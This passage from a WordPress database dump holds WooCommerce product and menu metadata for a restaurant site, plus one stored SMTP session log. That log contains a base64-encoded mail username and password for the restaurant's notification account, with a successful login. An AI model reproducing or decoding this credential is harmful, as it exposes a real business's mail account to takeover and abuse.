0,'_sold_individually','no'),(33741,180,'_weight','230'),(33742,180,'_length',''),(33743,180,'_width',''),(33744,180,'_height',''),(33745,180,'_upsell_ids','a:0:{}'),(33746,180,'_crosssell_ids','a:0:{}'),(33747,180,'_purchase_note',''),(33748,180,'_default_attributes','a:0:{}'),(33749,180,'_virtual','no'),(33750,180,'_downloadable','no'),(33751,180,'_product_image_gallery',''),(33752,180,'_download_limit','-1'),(33753,180,'_download_expiry','-1'),(33755,180,'_stock',''),(33756,180,'_stock_status','instock'),(33757,180,'_wc_average_rating','4.50'),(33758,180,'_wc_rating_count','a:2:{i:4;i:1;i:5;i:1;}'),(33759,180,'_wc_review_count','2'),(33760,180,'_downloadable_files','a:0:{}'),(33761,180,'_product_attributes','a:0:{}'),(33762,180,'_product_version','3.4.3'),(33763,180,'_price','86'),(33764,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33765,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33766,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33767,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33768,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33769,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33770,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33771,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33772,180,'mkdf_show_new_sign_woo_meta','no'),(33773,180,'slide_template','default'),(33774,180,'_wpb_vc_js_status','false'),(33775,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33776,3112,'_sku','PR0023'),(33777,3112,'_regular_price','86'),(33778,3112,'_sale_price',''),(33779,3112,'_sale_price_dates_from',''),(33780,3112,'_sale_price_dates_to',''),(33781,3112,'total_sales','0'),(33782,3112,'_tax_status','taxable'),(33783,3112,'_tax_class',''),(33784,3112,'_manage_stock','no'),(33785,3112,'_backorders','no'),(33786,3112,'_sold_individually','no'),(33787,3112,'_weight','280'),(33788,3112,'_length',''),(33789,3112,'_width',''),(33790,3112,'_height',''),(33791,3112,'_upsell_ids','a:0:{}'),(33792,3112,'_crosssell_ids','a:0:{}'),(33793,3112,'_purchase_note',''),(33794,3112,'_default_attributes','a:0:{}'),(33795,3112,'_virtual','no'),(33796,3112,'_downloadable','no'),(33797,3112,'_product_image_gallery',''),(33798,3112,'_download_limit','-1'),(33799,3112,'_download_expiry','-1'),(33800,3112,'_thumbnail_id','47'),(33801,3112,'_stock',''),(33802,3112,'_stock_status','instock'),(33803,3112,'_wc_average_rating','3.00'),(33804,3112,'_wc_rating_count','a:2:{i:2;i:1;i:4;i:1;}'),(33805,3112,'_wc_review_count','2'),(33806,3112,'_downloadable_files','a:0:{}'),(33807,3112,'_product_attributes','a:0:{}'),(33808,3112,'_product_version','3.4.3'),(33809,3112,'_price','86'),(33810,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33811,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33812,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33813,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33814,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33815,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33816,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33817,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33818,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33819,3112,'mkdf_show_new_sign_woo_meta','no'),(33820,3112,'slide_template','default'),(33821,3112,'_wpb_vc_js_status','false'),(33822,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33823,3113,'_sku','PR0024'),(33824,3113,'_regular_price','86'),(33825,3113,'_sale_price',''),(33826,3113,'_sale_price_dates_from',''),(33827,3113,'_sale_price_dates_to',''),(33828,3113,'total_sales','0'),(33829,3113,'_tax_status','taxable'),(33830,3113,'_tax_class',''),(33831,3113,'_manage_stock','no'),(33832,3113,'_backorders','no'),(33833,3113,'_sold_individually','no'),(33834,3113,'_weight','230'),(33835,3113,'_length',''),(33836,3113,'_width',''),(33837,3113,'_height',''),(33838,3113,'_upsell_ids','a:0:{}'),(33839,3113,'_crosssell_ids','a:0:{}'),(33840,3113,'_purchase_note',''),(33841,3113,'_default_attributes','a:0:{}'),(33842,3113,'_virtual','no'),(33843,3113,'_downloadable','no'),(33844,3113,'_product_image_gallery',''),(33845,3113,'_download_limit','-1'),(33846,3113,'_download_expiry','-1'),(33847,3113,'_thumbnail_id','48'),(33848,3113,'_stock',''),(33849,3113,'_stock_status','instock'),(33850,3113,'_wc_average_rating','5.00'),(33851,3113,'_wc_rating_count','a:1:{i:5;i:1;}'),(33852,3113,'_wc_review_count','1'),(33853,3113,'_downloadable_files','a:0:{}'),(33854,3113,'_product_attributes','a:0:{}'),(33855,3113,'_product_version','3.4.3'),(33856,3113,'_price','86'),(33857,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33858,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33859,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33860,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33861,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33862,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33863,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33864,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33865,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33866,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33867,3113,'mkdf_show_new_sign_woo_meta','no'),(33868,3113,'slide_template','default'),(33869,3113,'_wpb_vc_js_status','false'),(33870,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33871,3114,'_sku','PR0025'),(33872,3114,'_regular_price','86'),(33873,3114,'_sale_price',''),(33874,3114,'_sale_price_dates_from',''),(33875,3114,'_sale_price_dates_to',''),(33876,3114,'total_sales','0'),(33877,3114,'_tax_status','taxable'),(33878,3114,'_tax_class',''),(33879,3114,'_manage_stock','no'),(33880,3114,'_backorders','no'),(33881,3114,'_sold_individually','no'),(33882,3114,'_weight','310'),(33883,3114,'_length',''),(33884,3114,'_width',''),(33885,3114,'_height',''),(33886,3114,'_upsell_ids','a:0:{}'),(33887,3114,'_crosssell_ids','a:0:{}'),(33888,3114,'_purchase_note',''),(33889,3114,'_default_attributes','a:0:{}'),(33890,3114,'_virtual','no'),(33891,3114,'_downloadable','no'),(33892,3114,'_product_image_gallery',''),(33893,3114,'_download_limit','-1'),(33894,3114,'_download_expiry','-1'),(33895,3114,'_thumbnail_id','49'),(33896,3114,'_stock',''),(33897,3114,'_stock_status','instock'),(33898,3114,'_wc_average_rating','1.00'),(33899,3114,'_wc_rating_count','a:1:{i:1;i:1;}'),(33900,3114,'_wc_review_count','1'),(33901,3114,'_downloadable_files','a:0:{}'),(33902,3114,'_product_attributes','a:0:{}'),(33903,3114,'_product_version','3.4.3'),(33904,3114,'_price','86'),(33905,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33906,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33907,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33908,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33909,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33910,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33911,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33912,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33913,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33914,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33915,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(33916,3114,'mkdf_show_new_sign_woo_meta','no'),(33917,3114,'slide_template','default'),(33918,3114,'_wpb_vc_js_status','false'),(38291,3739,'_menu_item_object','custom'),(38289,3739,'_menu_item_menu_item_parent','0'),(38290,3739,'_menu_item_object_id','3739'),(38288,3739,'_menu_item_type','custom'),(38287,3738,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38286,3738,'_menu_item_url','#'),(38285,3738,'_menu_item_xfn',''),(38284,3738,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38283,3738,'_menu_item_target',''),(38282,3738,'_menu_item_object','custom'),(38281,3738,'_menu_item_object_id','3738'),(38280,3738,'_menu_item_menu_item_parent','0'),(38279,3738,'_menu_item_type','custom'),(38278,3737,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38277,3737,'_menu_item_url','#'),(38276,3737,'_menu_item_xfn',''),(38249,3734,'_menu_item_xfn',''),(38250,3734,'_menu_item_url','#'),(38251,3734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38252,3735,'_menu_item_type','custom'),(38253,3735,'_menu_item_menu_item_parent','0'),(38254,3735,'_menu_item_object_id','3735'),(38255,3735,'_menu_item_object','custom'),(38256,3735,'_menu_item_target',''),(38257,3735,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38258,3735,'_menu_item_xfn',''),(38259,3735,'_menu_item_url','#'),(38260,3735,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38261,3736,'_menu_item_type','custom'),(38262,3736,'_menu_item_menu_item_parent','0'),(38263,3736,'_menu_item_object_id','3736'),(38264,3736,'_menu_item_object','custom'),(38265,3736,'_menu_item_target',''),(38266,3736,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38267,3736,'_menu_item_xfn',''),(38268,3736,'_menu_item_url','#'),(38269,3736,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38270,3737,'_menu_item_type','custom'),(38271,3737,'_menu_item_menu_item_parent','0'),(38272,3737,'_menu_item_object_id','3737'),(38273,3737,'_menu_item_object','custom'),(38274,3737,'_menu_item_target',''),(38275,3737,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38193,3729,'_menu_item_menu_item_parent','0'),(38191,3728,'_menu_item_icon','null'),(38192,3729,'_menu_item_type','custom'),(38190,3728,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38189,3728,'_menu_item_url','#'),(38187,3728,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38188,3728,'_menu_item_xfn',''),(38186,3728,'_menu_item_target',''),(38185,3728,'_menu_item_object','custom'),(38184,3728,'_menu_item_object_id','3728'),(38183,3728,'_menu_item_menu_item_parent','0'),(38182,3728,'_menu_item_type','custom'),(38181,3727,'_menu_item_icon','null'),(38180,3727,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38179,3727,'_menu_item_url','#'),(38178,3727,'_menu_item_xfn',''),(38177,3727,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38176,3727,'_menu_item_target',''),(38175,3727,'_menu_item_object','custom'),(38174,3727,'_menu_item_object_id','3727'),(52322,4378,'_menu_item_menu_item_parent','4353'),(52311,4377,'_menu_item_type','custom'),(52312,4377,'_menu_item_menu_item_parent','4353'),(52313,4377,'_menu_item_object_id','4377'),(52314,4377,'_menu_item_object','custom'),(52315,4377,'_menu_item_target',''),(52316,4377,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52317,4377,'_menu_item_xfn',''),(52318,4377,'_menu_item_url','#'),(52319,4377,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52320,4377,'_menu_item_icon','null'),(52321,4378,'_menu_item_type','custom'),(52310,4376,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52308,4376,'_menu_item_xfn',''),(52309,4376,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(52306,4376,'_menu_item_target',''),(52307,4376,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52305,4376,'_menu_item_object','custom'),(52303,4376,'_menu_item_menu_item_parent','4367'),(52304,4376,'_menu_item_object_id','4376'),(52302,4376,'_menu_item_type','custom'),(52293,4375,'_menu_item_type','custom'),(52217,4367,'_menu_item_object_id','4367'),(52215,4367,'_menu_item_type','custom'),(52216,4367,'_menu_item_menu_item_parent','0'),(52214,4366,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52213,4366,'_menu_item_url','#'),(52212,4366,'_menu_item_xfn',''),(52211,4366,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52209,4366,'_menu_item_object','custom'),(52210,4366,'_menu_item_target',''),(52208,4366,'_menu_item_object_id','4366'),(52206,4366,'_menu_item_type','custom'),(52207,4366,'_menu_item_menu_item_parent','0'),(52204,4365,'_menu_item_url','#'),(52205,4365,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52203,4365,'_menu_item_xfn',''),(52200,4365,'_menu_item_object','custom'),(52198,4365,'_menu_item_menu_item_parent','0'),(52193,4364,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52191,4364,'_menu_item_object','custom'),(52192,4364,'_menu_item_target',''),(52190,4364,'_menu_item_object_id','4364'),(52189,4364,'_menu_item_menu_item_parent','0'),(52186,4363,'_menu_item_url','#'),(52187,4363,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52188,4364,'_menu_item_type','custom'),(52185,4363,'_menu_item_xfn',''),(37865,3719,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 19 Jan 2021 19:26:08 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.18 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <b2547e8d8c2210783106c31ceeacb8c6@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Wed, 20 Jan 2021 00:26:08 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Post=\r\n SMTP (from version 2.0.18 to 2.0.19)=0A=0A=0AIf you experience any issu=\r\nes or need support, the volunteers in the WordPress.org support forums m=\r\nay be able to help.=0Ahttps://wordpress.org/support/forums/=0A=0AThe Wor=\r\ndPress Team\r\n.\r\n250 OK id=1l21K4-0006zc-SH\r\n'),(37864,3719,'original_headers',''),(37863,3719,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Post SMTP (from version 2.0.18 to 2.0.19)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37862,3719,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37861,3719,'original_to','webmaster@baldisserri.com'),(37860,3719,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37859,3719,'to_header','webmaster@baldisserri.com'),(37858,3719,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37857,3719,'success','1'),(37856,3719,'solution','Not found, check status column for more info.'),(34086,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34087,3115,'_sku','PR0026'),(34088,3115,'_regular_price','86'),(34089,3115,'_sale_price',''),(34090,3115,'_sale_price_dates_from',''),(34091,3115,'_sale_price_dates_to',''),(34092,3115,'total_sales','0'),(34093,3115,'_tax_status','taxable'),(34094,3115,'_tax_class',''),(34095,3115,'_manage_stock','no'),(34096,3115,'_backorders','no'),(34097,3115,'_sold_individually','no'),(34098,3115,'_weight','310'),(34099,3115,'_length',''),(34100,3115,'_width',''),(34101,3115,'_height',''),(34102,3115,'_upsell_ids','a:0:{}'),(34103,3115,'_crosssell_ids','a:0:{}'),(34104,3115,'_purchase_note',''),(34105,3115,'_default_attributes','a:0:{}'),(34106,3115,'_virtual','no'),(34107,3115,'_downloadable','no'),(34108,3115,'_product_image_gallery',''),(34109,3115,'_download_limit','-1'),(34110,3115,'_download_expiry','-1'),(34111,3115,'_stock',''),(34112,3115,'_stock_status','instock'),(34113,3115,'_wc_average_rating','3.00'),(34114,3115,'_wc_rating_count','a:1:{i:3;i:1;}'),(34115,3115,'_wc_review_count','1'),(34116,3115,'_downloadable_files','a:0:{}'),(34117,3115,'_product_attributes','a:0:{}'),(34118,3115,'_product_version','3.4.3'),(34119,3115,'_price','86'),(34120,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34121,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34122,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34123,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34124,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34125,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34126,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34127,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34128,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34129,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34130,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34131,3115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34132,3115,'mkdf_show_new_sign_woo_meta','no'),(34133,3115,'slide_template','default'),(34134,3115,'_wpb_vc_js_status','false'),(34135,3115,'_thumbnail_id','467'),(34136,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34137,3116,'_sku','PR0027'),(34138,3116,'_regular_price','25'),(34139,3116,'_sale_price',''),(34140,3116,'_sale_price_dates_from',''),(34141,3116,'_sale_price_dates_to',''),(34142,3116,'total_sales','0'),(34143,3116,'_tax_status','taxable'),(34144,3116,'_tax_class',''),(34145,3116,'_manage_stock','no'),(34146,3116,'_backorders','no'),(34147,3116,'_sold_individually','no'),(34148,3116,'_weight','250'),(34149,3116,'_length',''),(34150,3116,'_width',''),(34151,3116,'_height',''),(34152,3116,'_upsell_ids','a:0:{}'),(34153,3116,'_crosssell_ids','a:0:{}'),(34154,3116,'_purchase_note',''),(34155,3116,'_default_attributes','a:0:{}'),(34156,3116,'_virtual','no'),(34157,3116,'_downloadable','no'),(34158,3116,'_product_image_gallery',''),(34159,3116,'_download_limit','-1'),(34160,3116,'_download_expiry','-1'),(34161,3116,'_stock',''),(34162,3116,'_stock_status','instock'),(34163,3116,'_wc_average_rating','4.00'),(34164,3116,'_wc_rating_count','a:1:{i:4;i:1;}'),(34165,3116,'_wc_review_count','1'),(34166,3116,'_downloadable_files','a:0:{}'),(34167,3116,'_product_attributes','a:0:{}'),(34168,3116,'_product_version','3.4.3'),(34169,3116,'_price','25'),(34170,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34171,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34172,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34173,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34174,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34175,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34176,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34177,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34178,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34179,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34180,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34181,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34182,3116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34183,3116,'mkdf_show_new_sign_woo_meta','no'),(34184,3116,'slide_template','default'),(34185,3116,'_wpb_vc_js_status','false'),(34187,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34188,3117,'_sku','PR0028'),(34189,3117,'_regular_price','89'),(34190,3117,'_sale_price',''),(34191,3117,'_sale_price_dates_from',''),(34192,3117,'_sale_price_dates_to',''),(34193,3117,'total_sales','0'),(34194,3117,'_tax_status','taxable'),(34195,3117,'_tax_class',''),(34196,3117,'_manage_stock','no'),(34197,3117,'_backorders','no'),(34198,3117,'_sold_individually','no'),(34199,3117,'_weight','310'),(34200,3117,'_length',''),(34201,3117,'_width',''),(34202,3117,'_height',''),(34203,3117,'_upsell_ids','a:0:{}'),(34204,3117,'_crosssell_ids','a:0:{}'),(34205,3117,'_purchase_note',''),(34206,3117,'_default_attributes','a:0:{}'),(34207,3117,'_virtual','no'),(34208,3117,'_downloadable','no'),(34209,3117,'_product_image_gallery',''),(34210,3117,'_download_limit','-1'),(34211,3117,'_download_expiry','-1'),(34212,3117,'_thumbnail_id','280'),(34213,3117,'_stock',''),(34214,3117,'_stock_status','instock'),(34215,3117,'_wc_average_rating','5.00'),(34216,3117,'_wc_rating_count','a:1:{i:5;i:1;}'),(34217,3117,'_wc_review_count','1'),(34218,3117,'_downloadable_files','a:0:{}'),(34219,3117,'_product_attributes','a:0:{}'),(34220,3117,'_product_version','3.4.3'),(34221,3117,'_price','89'),(34222,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34223,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34224,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34225,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34226,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34227,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34228,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34229,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34230,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34231,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34232,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34233,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34234,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34235,3117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34236,3117,'mkdf_show_new_sign_woo_meta','no'),(34237,3117,'slide_template','default'),(34238,3117,'_wpb_vc_js_status','false'),(34239,3117,'_wp_old_slug','cream-broccoli-soup'),(34240,3117,'_wp_old_slug','broccoli-soup'),(34241,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34242,3118,'_sku','PR0030'),(34243,3118,'_regular_price','58'),(34244,3118,'_sale_price',''),(34245,3118,'_sale_price_dates_from',''),(34246,3118,'_sale_price_dates_to',''),(34247,3118,'total_sales','0'),(34248,3118,'_tax_status','taxable'),(34249,3118,'_tax_class',''),(34250,3118,'_manage_stock','no'),(34251,3118,'_backorders','no'),(34252,3118,'_sold_individually','no'),(34253,3118,'_weight','310'),(34254,3118,'_length',''),(34255,3118,'_width',''),(34256,3118,'_height',''),(34257,3118,'_upsell_ids','a:0:{}'),(34258,3118,'_crosssell_ids','a:0:{}'),(34259,3118,'_purchase_note',''),(34260,3118,'_default_attributes','a:0:{}'),(34261,3118,'_virtual','no'),(34262,3118,'_downloadable','no'),(34263,3118,'_product_image_gallery',''),(34264,3118,'_download_limit','-1'),(34265,3118,'_download_expiry','-1'),(34266,3118,'_thumbnail_id','273'),(34267,3118,'_stock',''),(34268,3118,'_stock_status','instock'),(34269,3118,'_wc_average_rating','5.00'),(34270,3118,'_wc_rating_count','a:1:{i:5;i:1;}'),(34271,3118,'_wc_review_count','1'),(34272,3118,'_downloadable_files','a:0:{}'),(34273,3118,'_product_attributes','a:0:{}'),(34274,3118,'_product_version','3.4.3'),(34275,3118,'_price','58'),(34276,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34277,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34278,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34279,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34280,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34281,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34282,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34283,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34284,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34285,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34286,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34287,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34288,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34289,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34290,3118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34291,3118,'mkdf_show_new_sign_woo_meta','no'),(34292,3118,'slide_template','default'),(34293,3118,'_wpb_vc_js_status','false'),(34294,3118,'_wp_old_slug','sea-weed-risotto'),(34295,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34296,3119,'_sku','PR0029'),(34297,3119,'_regular_price','95'),(34298,3119,'_sale_price',''),(34299,3119,'_sale_price_dates_from',''),(34300,3119,'_sale_price_dates_to',''),(34301,3119,'total_sales','0'),(34302,3119,'_tax_status','taxable'),(34303,3119,'_tax_class',''),(34304,3119,'_manage_stock','no'),(34305,3119,'_backorders','no'),(34306,3119,'_sold_individually','no'),(34307,3119,'_weight','100'),(34308,3119,'_length',''),(34309,3119,'_width',''),(34310,3119,'_height',''),(34311,3119,'_upsell_ids','a:0:{}'),(34312,3119,'_crosssell_ids','a:0:{}'),(34313,3119,'_purchase_note',''),(34314,3119,'_default_attributes','a:0:{}'),(34315,3119,'_virtual','no'),(34316,3119,'_downloadable','no'),(34317,3119,'_product_image_gallery',''),(34318,3119,'_download_limit','-1'),(34319,3119,'_download_expiry','-1'),(34320,3119,'_thumbnail_id','278'),(34321,3119,'_stock',''),(34322,3119,'_stock_status','instock'),(34323,3119,'_wc_average_rating','4.00'),(34324,3119,'_wc_rating_count','a:1:{i:4;i:1;}'),(34325,3119,'_wc_review_count','1'),(34326,3119,'_downloadable_files','a:0:{}'),(34327,3119,'_product_attributes','a:0:{}'),(34328,3119,'_product_version','3.4.3'),(34329,3119,'_price','95'),(34330,3119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34331,3119,'_vc_post_settings','a:1